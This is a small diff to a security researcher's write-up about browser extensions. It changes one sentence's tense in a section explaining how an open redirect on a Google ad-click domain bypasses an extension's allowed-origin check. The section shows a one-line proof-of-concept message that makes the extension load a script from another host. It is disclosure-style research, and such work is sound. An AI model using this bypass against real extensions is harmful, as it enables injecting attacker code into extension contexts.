NDevTK/writeups/_posts/2023-08-18-extensions.md

 ### An alternative way
 The new security check has a list of allowed origins however there's open redirects!
-However this only works for the `application/javascript` content type.
+However this only worked for the `application/javascript` content type.
 ```js
 chrome.runtime.sendMessage({message: 'LoadScript', url: 'https://googleads.g.doubleclick.net/pcs/click?adurl=http://localhost:8000/x.js'}, console.log);
 ```